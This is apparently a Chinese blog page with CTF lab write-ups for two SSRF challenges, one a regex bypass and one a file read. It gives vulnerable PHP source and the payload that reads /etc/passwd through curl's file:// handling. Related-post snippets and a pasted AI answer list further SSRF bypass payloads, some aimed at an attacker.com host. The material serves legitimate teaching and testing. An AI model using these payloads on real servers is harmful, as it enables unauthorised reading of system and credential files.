SSRF正则绕过1+SSRF文件读取

最新推荐文章于 2025-10-23 16:52:10 发布
原创 最新推荐文章于 2025-10-23 16:52:10 发布 · 674 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

文章讲述了在两个网络安全挑战中,如何通过SSRF漏洞利用正则表达式绕过限制并读取文件,包括使用Dirsearch工具、CURL操作以及在Docker环境下的环境部署。参与者需要理解并实施payload来获取flag。

[题目信息]:

题目名称题目难度
SSRF正则绕过11

[题目考点]:

SSRF正则绕过1

[Flag格式]:

SangFor{5IbCdntb9LqcbhdQZszyr8wnZ2Uhdj6i}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

docker-compose up -d

[题目writeup]:

1、实验主页

2、使用dirsearch扫描网站目录

python dirsearch.py -u http://分配IP -e php

3、扫描到文件flag.php,访问flag.php文件

4、提示仅可以本地访问

5、代码中要求http格式为

host中以Sang开头
结尾为for

6、因此利用@、.符号和?号绕过正则匹配。

7、至此获得flag,实验结束。

[题目信息]:

题目名称题目难度
SSRF文件读取1

[题目考点]:

SSRF文件读取

[Flag格式]:

SangFor{Ux5uIUUb5un08PWtsabg5mqF2oTCY8kg}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

docker-compose up -d

[题目writeup]:

1、题目主页

2、点击提交查询

3、题目源码

<?php 
if(!$_GET['site']){ 
	$str = <<<EOD
<html> 
<body> 
look source code: 
<form action='' method='GET'> 
<input type='submit' name='submit' /> 
<input type='text' name='site' style="width:1000px" value="https://www.baidu.com"/> 
</form>
</body>
</html>
EOD;

echo $str;
die();
}

$url = $_GET[‘site’];
$url_schema = parse_url($url);
$host = $url_schema[‘host’];
$request_url = $url."/";

if ($host !== ‘www.baidu.com’){
die(“wrong site”);
}

$ci = curl_init();
curl_setopt($ci, CURLOPT_URL, $request_url);
curl_setopt($ci, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ci);
curl_close($ci);

if($res){
echo "<h1>Source Code:</h1>";
echo $request_url;
echo "<hr />";
echo htmlentities($res);
}else{
echo "get source failed";
}

?>

4、利用file协议读取/etc/passwd文件

  • 用file协议读取本地文件
  • 绕过逻辑中对host的检查, curl是支持file://host/path, file://path这两种形式, 但是即使有host, curl仍然会访问到本地的文件
  • 截断url后面拼接的/, GET请求, 用?#都可以

5、Payload:

file://www.baidu.com/etc/passwd?

6、成功访问passwd文件,至此实验结束。

passwd读取成功,思考如何读取flag文件!

网安知识系列:SSRF漏洞中绕过IP限制的几种方法总结
weixin_54626591的博客
04-21 837
SSRF漏洞中绕过IP限制的几种方法总结
文件操作安全之-文件读取原理篇
村中少年的专栏
10-31 1456
文件读取的定义,文件读取漏洞原理,文件读取漏洞的具体案例,例如Jenkins CVE-2018-1999002 和gitlab CVE-2016-9086文件解析漏洞,以及文件读取漏洞潜在的危害阐述文件读取漏洞中的安全问题。
SSRF(3)伪协议读取文件&Gopher协议的利用
m0_64417923的博客
05-12 4379
一:Http、Dict和file等协议的利用 1,内网访问 所以构造: /?url=http://127.0.0.1/flag.php 得到: ctfhub{ce475b59a4baee959112777b} 2,伪协议读取文件 最经典的PHP伪协议就是file:///协议了,可以用来读取php源码 构造payload: /?url=file:///var/www/html/flag.php 得到: 在单击右键查看源代码: 得到flag: ctfh..
SSRF3 任意文件读取
2401_89464052的博客
06-17 1066
该文演示了通过SSRF漏洞利用file协议读取服务器敏感文件的过程。首先通过file:///etc/passwd读取系统文件,接着尝试读取PHP配置文件/var/www/html/pikachu-master/inc/config.inc.php,发现浏览器默认隐藏代码但可通过开发者工具查看。此外还展示了使用php://filter协议配合base64编码绕过限制读取文件的方法,包括如何对获取的base64编码内容进行解码。文章揭示了SSRF漏洞可能导致服务器敏感信息泄露的安全风险。
【网络安全】web 渗透 ——SSRF 漏洞详解:从文件读取到命令执行,攻击链全拆解!
最新发布
Button12138的博客
10-23 484
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。
【ctfhub-ssrf】伪协议读取文件
weixin_52116519的博客
04-28 1587
题目 根据题目提示,需要我们读取服务器的web目录的flag.php文件。web目录一般在/var/www/html。 file:// 协议 中文释义:本地文件传输协议 注解:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 应用:要使用File协议,基本的格式如下:file:///文件路径 比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或IE地址栏中键入:file:///f:/flash/1.swf并回车。 解题 ...
审计 6 SSRF和任意文件读取
weixin_30786617的博客
08-13 378
1 <?php 2 error_reporting(0); 3 session_start(); 4 header("Content-type:image/jpeg"); 5 echo file_get_contents($_SESSION['avatar']); 6 ?> 在第5行发现 读取文件后,将文件进行了输出。 所以猜测此处可能存在SSRF 和...
ssrf 内网访问 伪协议 读取文件 端口扫描
qq_69100706的博客
08-12 802
SSRF(Server-Side Request Forgery,服务器侧请求伪造)是一种利用服务器发起网络请求的能力来攻击内网资源或执行其他恶意活动的技术。SSRF可以用于访问通常不可由外部直接访问的内网资源,读取文件,甚至进行端口扫描。
ssrf知识点总结
hackzkaq的博客
11-25 1945
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一.ssrf基础知识 ssrf的定义 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞, 一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求时由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统)。 ssrf的成因 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 例如,黑客操
CSRF与SSRF漏洞详解
m0_66872110的博客
05-15 739
本文深入探讨了网络安全中的两大漏洞——CSRF(跨站请求伪造)和SSRF(服务器端请求伪造),并提供了防御策略。CSRF通过利用用户的登录状态发起非法请求,而SSRF则利用服务器发起内部请求,绕过网络防护。文章详细解析了这两种攻击的原理、攻击场景及升级手段,并提出了包括Token验证、SameSite Cookie设置、敏感操作二次验证等防御措施。同时,文章强调了网络安全的重要性,建议企业和个人用户采取主动防御措施,如定期渗透测试、采用纵深防御策略和启用账户二次验证功能,以构建更安全的网络环境。
【漏洞挖掘】——75、任意文件读取攻防原理
Fly_鹏程万里
06-11 478
在web安全中任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。
CTFHub技能树web(持续更新)--SSRF--伪协议读取文件
jiuyongpinyin的博客
01-27 2520
伪协议读取文件 这里我们先来了解一下SSRF中的URL的伪协议: file:/// dict:/// sftp:// ldap:// tftp:// gopher:// 然后通过题目给我们的提示,我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,其实如果看过我之前的结题,在文件上传的题目里,我们使用蚁剑连接后就能够看到目录,所以我们直接构造url: ?url=file:///var/www/html/flag.php 发现只有三个问号,这里需要查看一下网页源代码,当然也可以只
Apache Solr SSRF文件读取漏洞
渗透之路,攻防之间皆学问
04-02 6164
目录 一. 漏洞描述 二. 影响版本 三. 漏洞复现 1. 复现条件 2. windows下搭建漏洞环境 3. 漏洞测试 四. 漏洞检测POC 五. 漏洞修复 一. 漏洞描述 Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。 该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读...
SSRF 漏洞笔记
weixin_45653478的博客
03-22 1423
Gopher 在 HTTP 协议前是非常有名的信息查找系统,但是 WWW 万维网出现之后 Gopher 逐渐没落,但是在 SSRF 漏洞中 Gopher 协议让洞利用更加灵活,利用此协议可以对 ftp,memcache,mysql,telnet,redis,等服务进行攻击,可以构造发送 GET,POST 请求包。
Web安全 SSRF漏洞的 测试和利用.(读取服务器的任何文件
网络安全领域___专研者.
03-04 5001
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个漏洞。(例如:攻击者操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造)SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器.
SSRF详解
weixin_73055648的博客
07-11 622
SSRF:服务端请求伪造SSRF常出现在那些获取其他服务器上的资源又对用户的输入过滤不严的WEB应用像获取网页内容、图片等?url=?image=攻击者通过构造url以及image的参数,利用有SSRF漏洞的服务器发起自己构造的请求。
ssrf总结
weixin_44576725的博客
05-01 2678
SSRF总结 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
SSRF 漏洞实践:端口扫描与任意文件读取
weixin_43822401的博客
06-10 997
SSRF 漏洞可以用来进行端口扫描和任意文件读取,从而威胁目标服务器的安全。为了防止 SSRF 漏洞,需要对用户输入进行严格的校验,并使用安全的编码和解码库。此外,还需要定期进行安全测试,及时发现并修复 SSRF 漏洞。
【漏洞学习——SSRF】当当网某站点SSRF可以遍历本地文件
Fly_鹏程万里
02-22 694
漏洞细节 http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&amp;call_time=1467988328&amp;method=header&amp;source=a8d620b2bb6cce75bd6d7db53c1486e2&amp;url=file:///etc/passwd http://caipiao.dangda...
如何绕过相对路径进行ssrf
03-26
<think>嗯,用户问的是如何绕过相对路径进行SSRF,也就是服务器端请求伪造。首先,我得回忆一下SSRF的基本概念,攻击者利用服务器发起未经授权的请求,通常针对内部系统。相对路径绕过可能涉及到如何让服务器解析URL时访问非预期的资源。 首先,可能需要考虑URL解析的差异。不同的库或框架处理URL的方式可能不同,比如有的会处理路径标准化,或者处理特殊字符。比如,使用../这样的目录遍历可能会被某些解析器处理,从而访问上级目录或其他资源。例如,http://example.com/../../etc/passwd 这样的请求,如果服务器没有正确过滤,可能会访问到系统文件。 然后,想到可能用到的编码或特殊字符。比如对斜杠进行编码,比如%2e%2e%2f代表../,或者使用双重编码,比如%252e%252e%252f。有些服务器可能在解码后处理这些路径,导致绕过。 还有,可能利用协议处理的不同。比如,使用file://协议直接访问本地文件,但通常相对路径是相对于当前目录的。如果结合目录遍历,可能构造如file:///etc/passwd,但如何让服务器解析相对路径可能需要更多的技巧。 另外,想到一些Web服务器在处理URL重定向时的行为,比如如果应用允许用户提供重定向的URL,攻击者可能构造一个相对路径的重定向,导致服务器访问内部资源。例如,Location头中的相对路径可能会被服务器解析为内部地址。 还有,考虑使用@符号来绕过。比如http://example.com@internal/resource,但这种情况更多用于身份验证部分,可能和相对路径绕过关系不大,但需要确认是否有其他利用方式。 再考虑一些特定的框架或库的漏洞,比如某些旧版本的库可能对URL的解析存在缺陷,允许通过特定的字符组合绕过路径检查。例如,使用反斜杠\代替正斜杠,或者混合使用大小写,但现代服务器通常会对这些进行标准化处理。 另外,可能需要结合其他漏洞,比如文件名注入或者路径拼接问题。如果应用将用户输入拼接到路径中,而没有正确清理,攻击者可以利用../跳出限制目录,访问其他路径。 比如,假设应用允许用户输入一个路径参数,如http://example.com/api?file=user/data.txt,攻击者可能修改为file=../../../../etc/passwd,从而读取系统文件。这种情况下,相对路径绕过是通过目录遍历实现的。 但问题是如何绕过相对路径的限制,可能用户指的是服务器本身限制了使用相对路径来访问某些资源,而攻击者需要找到方法绕过这种限制,让服务器发起对非预期地址的请求。 可能想到使用绝对URL来替代相对路径,但绝对URL可能被过滤。或者,利用URL解析器中的差异,比如将绝对URL编码或拆分,使得检查机制失效。 比如,使用http://attacker.com#@internal.resource 这样的构造,可能某些解析器会将其解释为访问internal.resource,而其他部分视为片段标识符。 或者,利用DNS重绑定技术,使得域名解析为内部IP,但这种方法可能属于另一种SSRF绕过方式,而非直接处理相对路径。 再想,是否有其他方法可以让服务器在处理相对路径时,解析到攻击者控制的地址。例如,通过控制Host头或Referer头,诱导服务器生成包含相对路径的URL,从而指向内部服务。 或者,结合某些API的参数,比如通过控制参数值,使得服务器在拼接URL时,生成指向内部资源的绝对路径,例如将参数值设置为@internal:8080,导致生成类似http://example.com/api/@internal:8080的请求,从而访问内部服务。 可能还需要考虑不同的协议处理,比如使用gopher://、dict://等协议,结合相对路径构造特定的请求,但这类协议通常需要绝对路径,所以相对路径可能不适用。 总结一下,可能的绕过方法包括: 1. 目录遍历(使用../或编码后的形式) 2. 利用URL解析差异(如特殊字符、编码) 3. 协议处理不当(如file://结合路径遍历) 4. 参数注入或拼接漏洞 5. 利用重定向或HTTP头控制 6. DNS重绑定(间接相关) 需要验证这些方法的可行性,并给出具体的例子。比如,构造一个包含编码后的../的URL,或者利用服务器拼接URL时的漏洞,将用户输入的部分作为路径的一部分,通过目录遍历跳出限制。 同时,防御措施方面,应该对用户输入的URL进行严格校验,禁止使用file://等危险协议,过滤或标准化路径中的特殊字符,使用白名单机制允许的域名和协议,以及设置网络层防护,限制服务器访问内部服务。</think>--- ### 如何绕过相对路径进行SSRFSSRF(服务器端请求伪造)是一种攻击技术,攻击者诱导服务器向非公开的内部资源发起请求。绕过相对路径限制是SSRF绕过的一种常见手段,以下是逐步分析及典型方法: --- #### **1. 理解相对路径解析机制** 相对路径(如`/api/../admin`)会被服务器解析为绝对路径(如`/admin`)。但若服务器未正确规范化路径,攻击者可构造特殊路径访问受限资源。 --- #### **2. 绕过方法及示例** ##### **方法1:目录遍历(Path Traversal)** - **原理**:利用`../`跳转至上级目录,绕过路径限制。 - **示例**: ```plaintext http://example.com/api?url=http://attacker.com/../../etc/passwd ``` 若服务器拼接路径时未过滤`../`,可能读取系统文件。 ##### **方法2:URL编码绕过** - **原理**:对特殊字符(如`/`、`.`)进行编码,绕过黑名单过滤。 - **示例**: ```plaintext http://example.com/api?url=http://attacker.com/%2e%2e%2f%2e%2e%2fetc/passwd ``` 解码后为`../../etc/passwd`。 ##### **方法3:协议结合路径遍历** - **原理**:利用`file://`协议直接访问本地文件,结合相对路径。 - **示例**: ```plaintext http://example.com/api?url=file:///var/www/../../etc/passwd ``` ##### **方法4:参数注入拼接** - **原理**:利用服务器拼接URL时的逻辑漏洞,注入路径。 - **示例**: ```plaintext http://example.com/api?path=@internal-host:8080/admin ``` 若服务器拼接为`http://user:@internal-host:8080/admin`,可能访问内网服务。 ##### **方法5:利用重定向** - **原理**:诱导服务器跟随重定向至内部地址。 - **示例**: ```plaintext http://example.com/api?url=http://attacker.com/redirect?target=http://127.0.0.1 ``` --- #### **3. 防御措施** 1. **输入校验**: - 禁止用户输入包含`file://`、`localhost`、`127.0.0.1`等敏感协议或地址。 - 使用正则表达式严格匹配白名单域名(如`^https?://example\.com/`)。 2. **路径规范化**: - 解析URL前,标准化路径(如移除`../`)。 3. **网络层防护**: - 限制服务器出站流量,禁止访问内部IP段。 4. **使用SSRF防护库**: - 如Python的`requests`库结合`urlparse`进行安全解析。 --- #### **总结** 绕过相对路径的核心是**利用路径解析差异**和**输入过滤缺陷**。防御需结合多层级校验、规范化处理及网络隔离。实际渗透测试中,需根据目标服务器的解析特性构造Payload。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值